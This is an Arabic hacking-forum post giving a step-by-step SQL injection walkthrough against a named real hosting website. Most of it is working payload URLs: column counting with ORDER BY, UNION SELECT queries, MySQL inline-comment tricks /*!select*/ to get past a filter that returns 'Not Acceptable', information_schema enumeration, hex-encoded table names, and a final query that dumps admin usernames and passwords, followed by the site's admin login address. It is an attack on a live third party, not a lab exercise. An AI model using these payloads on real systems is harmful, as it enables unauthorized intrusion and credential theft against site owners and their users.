بدايه تعلم الهكر من الصفر الى الاحتراف
مرحبا بكم في منتديات

mr11-11mr.7olm.org

تعلم الهكر وكل شيئ

تعلم صيانه وبرمجه الجوالات

عن اصول الهكر

والكثير من البرامج النادره وبروابط شغاله



مع تحيات HackeR Mobile


تعليم اصول الهكر
 
الرئيسيةالبوابةالمنشوراتبحـثالأعضاءالتسجيلدخول

شاطر | 
 

 حل مشكله not acceptable عند الحقن

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin


avatar

عدد المساهمات : 341
تاريخ التسجيل : 13/05/2011
العمل/الترفيه : مصور
المزاج المزاج : Don't Play With Me

مُساهمةموضوع: حل مشكله not acceptable عند الحقن   الخميس سبتمبر 08, 2011 10:44 pm



.......








اليوم وقعت على موقع مصاب ب SQL

و لكنت عندما حاولت الاستغلال واجهتنى مشكله ذهبت الى احد الاصدقاء لانى فتره و انا توقفت عن الحقن يمكن اكثر من

سنه

المهم ها الشخص و هو معنا فى المنتدى قالى شغل مخك هههههههههههه

المهم و اليكم ما فعلت لان اكيد راح تستفيدون من هذا

================================================== =========

اولا انا وجدت الثغره هنا

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=1484
طبعا اول شىء وضعت العلامه المفضضله لكشف اى خطا بالقاعده و هى (') و اصبح الموقع

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=1484'
طيب الحين ظهر ان الموقع مصاب قررت الاستغلال

طبعا بدائت اضيف و اجرب حتى اتمكن من ايجاد العمود المصاب المهم اول شىء اضفت

هذا حل
كود PHP:
order+by+100
الاخر
كود PHP:
order by 100
الاثنين يفعلون نفس الامر المهم انا اظل انقص برقم (100) حتى تعود الصفحه كما كانت و هنا يكون المكان المطلوب المهم حتى ما اطول صار معى عند

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=1484+ORDER+BY+52
و بدائت الاستغلال


كود PHP:
http://www.crystallnet.se/hosting/index.php?id=-1484%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--
و كانت النتيجه مثل ما شفتم

"Not Acceptable"

المهم وش تعتقدون ممكن اسوى جربت كل شىء اولا جربت اغير بين 1,2,3,4 و ما شبك

اولا فكرت فى

كود PHP:
UNION (SELECT 1,2,3,4,5......)
ثانيا فكرت فى
كود PHP:
UNION SELECT 1/**/2/**/3/**/4/**/........
ثالثا فكرت فى
كود PHP:
UNION SELECT 111/**/222/**/333/**/......
كلهم ما شبكم

حتى تذكرت هذا الفلتر الوحش القوى اللى كنت ناسيه

كود PHP:
/*!......*/
و بداء بوضعها عند ال SELECT و اصبح كالتالى

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=-1484%20union%20/*!select*/%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--
و اخيرا بدا يشبك الموقع

و طبعا ظهر عندكم العمود المصاب و هو "4"

المهم بداءت وضع VERSION() &DATABASE()&USER() و كله تمام

واجهتنى مشكله اخرى و هى عند تنفيذ ال

كود PHP:
CONCAT()
و كان بهذا الشكل

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=-1484%20union%20/*!select*/%201,2,3,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns--
واجهتنى نفس المشكله مره اخرى و هى

"Not Acceptable"

و طبعا اكيد المشكله دلوقتى عند ال GROUP_CONCAT() طبعا و الحل هو الفلتره ب

كود PHP:
/*!GROUP_CONCAT(......)*/
و هيبقى الاستغلال كده يا رجاله احلى موقع

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns--
طبعا اشتغلت و بقى زى الفل

قلت كمل يا واد يا LINUX.BT3 كمل و ربنا هيكرمك بحجات حلوه كفايه انك حاسس انك بتكلم السيرفر لول

المهم كملت

طيب انا قلت مش ناقص الا انى ادور على ال PASSWD

المهم رحت على موقع تشفير يشفر علشان احول %passwd% ل char()

او ممكن فى ناس تستخدم ال HackBar ألمهم نكمل و شفرت و اصبح التشفير

كود PHP:
CHAR(37, 112, 97, 115, 37)
طبعا رحت كملت الاستغلال باضافه
كود PHP:
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
اصبح الاستغلال

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--
المهم نفس المشكله تانى و هى

"Not Acceptable"

المهم طيب شباب احنا فلترنا ال SELECT و مشى الحال

وفلترنا ال CONCAT و مشى الحال و زى الفل

طيب اخر حاجه اضفناها و هى ال WHERE

يبقى نروح نقفشها و نفلتر ابوها

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns+/*!where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)*/--
تمام طبعا ظبط معاكم و زى الفل

طيب نكمل دلوقتى طلع لنا التاالى

cr_users:password:crytse_crystallnet

طيب دلوقتى كل شىء تمام عايزين نصطاد ام الادمن

يلا بينا نروح نشفر
cr_users تشفير MySql hex-encoded string

علشان نجيب البهاريز اللى جوه

طبعا من اشهر المواقع او اشهرهم لي شخصيا

http://www.waraxe.us/sql-char-encoder.html

المهم بعد التشفير يصبح

كود PHP:
0x63725f7573657273
طيب نكل الاستغلال

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!group_concat(table_name,0x3a,column_name,0x3a,table_schema)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+information_schema.columns+/*!where+table_name=0x63725f7573657273*/--
طبعا ظهر كل شىء يا حلاوه

فل اوى المهم نكمل دلوقتى بقى احنا محتاجين نجمع معلومات عن المكان اللى احنا فيه و هو ال columns بتاعه

ال cr_user

و تمام زى ما انتم شايفين فى الجزء ده

كود PHP:
cr_users:username:crytse_crystallnet,cr_users:password:
طيب تمام الاستغلال الاخير بقى طبعا

كود PHP:
http://www.crystallnet.se/hosting/index.php?id=-1484 union /*!select*/ 1,2,3,/*!concat(username,0x3a,password)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+crytse_crystallnet.cr_users--
ومبروك عليكم الادمن شباب

ارجو ان اكون افدت الجميع ارجو التقييم اذا كان الموضوع جيد

طبعا انا لا اعلم اذا كان الجميع يعلم هذا او لا و لكنى متاكد انى افدت احد

ملاحظه هناك فرق كبير بين ال
كود PHP:
concat()
و

كود PHP:
group_concat()
حاولوا تغيرها و ستلاحظون الفرق


لوحه دخول الادمن

http://www.crystallnet.se/admin/






منقول للفائده


........





L10q@hotmail.com

fuad4me@gmail.com


[size=24]للشكاوي   و الاقتراحات 

[/size]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://mr11-11mr.7olm.org
 
حل مشكله not acceptable عند الحقن
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
بدايه تعلم الهكر من الصفر الى الاحتراف :: قسم الثغرات-
انتقل الى: